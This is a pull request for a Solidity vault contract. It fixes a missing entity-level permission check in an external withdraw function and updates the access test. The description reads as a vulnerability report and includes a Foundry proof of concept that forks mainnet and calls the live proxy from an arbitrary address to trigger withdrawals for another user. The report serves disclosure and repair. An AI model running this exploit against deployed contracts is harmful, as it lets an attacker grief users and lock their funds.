### PR TITLE
External withdraw permission check

### DIFF
--- a/src/facets/TokenizedVaultIOFacet.sol
+++ b/src/facets/TokenizedVaultIOFacet.sol
@@ -53,7 +53,7 @@ contract TokenizedVaultIOFacet is Modifiers, ReentrancyGuard {
         address _receiver,
         address _externalTokenAddress,
         uint256 _amount
-    ) external notLocked nonReentrant assertPrivilege(LibObject._getParentFromAddress(msg.sender), LC.GROUP_EXTERNAL_WITHDRAW_FROM_ENTITY) {
+    ) external notLocked nonReentrant assertPrivilege(_entityId, LC.GROUP_EXTERNAL_WITHDRAW_FROM_ENTITY) {
         if (!LibACL._hasGroupPrivilege(LibHelpers._getIdForAddress(_receiver), _entityId, LibHelpers._stringToBytes32(LC.GROUP_EXTERNAL_WITHDRAW_FROM_ENTITY)))
             revert ExternalWithdrawInvalidReceiver(_receiver);
         LibTokenizedVaultIO._externalWithdraw(_entityId, _receiver, _externalTokenAddress, _amount);

--- a/test/T02Access.t.sol
+++ b/test/T02Access.t.sol
@@ -149,20 +149,19 @@ contract T02Access is D03ProtocolDefaults {
         changePrank(ea);
         writeTokenBalance(ea.addr, naymsAddress, wethAddress, 1 ether);
         nayms.externalDeposit(wethAddress, 1 ether); // deposit 100 weth into ea's parent (sm.entityId)
-        // Withdrawing from the entity sm.entityId
         nayms.externalWithdrawFromEntity(sm.entityId, ea.addr, wethAddress, 100);
 
         changePrank(cc);
         writeTokenBalance(cc.addr, naymsAddress, wethAddress, 1 ether);
-        vm.expectRevert(); // Invalid group privilege
         nayms.externalWithdrawFromEntity(sm.entityId, cc.addr, wethAddress, 100);
 
         changePrank(sm);
-        nayms.setEntity(cc.id, sm.entityId); // User's parent must be set to the entity to deposit and withdraw from it
-        changePrank(cc);
-        nayms.externalWithdrawFromEntity(sm.entityId, cc.addr, wethAddress, 100);
+        hCreateEntity(ts.entityId, ts.id, entity, "entity test hash");
+        changePrank(sa);
+        hAssignRole(ts.id, ts.entityId, LC.ROLE_ENTITY_ADMIN);
 
-        vm.expectRevert(abi.encodeWithSelector(ExternalWithdrawInvalidReceiver.selector, sm.addr));
+        changePrank(ts);
+        vm.expectRevert(abi.encodeWithSelector(InvalidGroupPrivilege.selector, ts.id, sm.entityId, "", LC.GROUP_EXTERNAL_WITHDRAW_FROM_ENTITY));
         nayms.externalWithdrawFromEntity(sm.entityId, sm.addr, wethAddress, 100); // Invalid receiver sm.addr
     }
 


### PR DESCRIPTION
Any user privileged to deposit/withdraw from the protocol can withdraw funds for other users, blocking them from performing any operation with their funds.

### Brief / Intro 

The protocol allows users to deposit and withdraw funds for themselves via the TokenizedVaultIOFacet. The problem arises from the fact that there's no msg.sender validation for a specific entity, meaning that any user can withdraw funds for others. This effectively blocks any subsequent operations with these funds because they need to be redeposited again.

The vulnerability lies inside the externalWithdrawFromEntity function in TokenizedVaultIOFacet. If we check its implementation, we can notice that the only check for msg.sender is a privilege check:

```solidity
function externalWithdrawFromEntity(
    bytes32 _entityId,
    address _receiver,
    address _externalTokenAddress,
    uint256 _amount
) external notLocked nonReentrant @> assertPrivilege(LibObject._getParentFromAddress(msg.sender), LC.GROUP_EXTERNAL_WITHDRAW_FROM_ENTITY) {
    if (!LibACL._hasGroupPrivilege(LibHelpers._getIdForAddress(_receiver), _entityId, LibHelpers._stringToBytes32(LC.GROUP_EXTERNAL_WITHDRAW_FROM_ENTITY))) {
        revert ExternalWithdrawInvalidReceiver(_receiver);
    }
    LibTokenizedVaultIO._externalWithdraw(_entityId, _receiver, _externalTokenAddress, _amount);
}
```

However, there is no check to ensure that the user is privileged to operate on the current entityId, meaning that any user can withdraw funds for anyone else, effectively blocking interaction with the protocol.

### Impact Details

The impact of this bug would be a Denial of Service (DoS), as funds can't be properly used by the users. A potential attacker can block any operation with the funds, causing griefing. Even though the attacker won't gain anything from this, they can block the protocol's entire execution flow.

 ### Proof of Concept

```solidity
/ SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.13;

import {Test, console} from "forge-std/Test.sol";

interface IFaucet {
    function externalDeposit(
        address _externalTokenAddress,
        uint256 _amount
    ) external;
    function externalWithdrawFromEntity(
        bytes32 _entityId,
        address _receiver,
        address _externalTokenAddress,
        uint256 _amount
    ) external;
}

interface IERC20 {
    function approve(address spender, uint256 amount) external returns (bool);
}

contract NaymsTest is Test {
    address constant DIAMOND_PROXY = 0x39e2f550fef9ee15b459d16bD4B243b04b1f60e5;

    function setUp() public {
        string memory RPC_URL = vm.envString("MAINNET_RPC_URL");
        vm.createSelectFork(RPC_URL);
    }

    function test_AnyoneCanWithdraw() public {
        address token = 0x59D9356E565Ab3A36dD77763Fc0d87fEaf85508C;
        address originalSender = 0x9EF1a8876913700C7f4C3ab1180B942bbf8da1E5;
        bytes32 entityId = 0x47c67c57691019e03f7ff8820017dbfaee44462089bb7217c1524835f4c88159;

        bytes memory data = abi.encodeWithSelector(
            IFaucet.externalDeposit.selector,
            token,
            100e18
        );

        vm.startPrank(originalSender);
        IERC20(token).approve(DIAMOND_PROXY, 10000e18);
        (bool success, ) = DIAMOND_PROXY.call(data);
        require(success, "Faucet call through diamond proxy failed");
        data = abi.encodeWithSelector(
            IFaucet.externalWithdrawFromEntity.selector,
            entityId,
            originalSender,
            token,
            100e18
        );

        vm.stopPrank();
        address randomSender = 0xA32A182314dE08d8b343a6c091BF63b366dc1b02;
        vm.prank(randomSender);
        (success, ) = DIAMOND_PROXY.call(data);
        require(success, "Faucet call through diamond proxy failed");
    }
}
```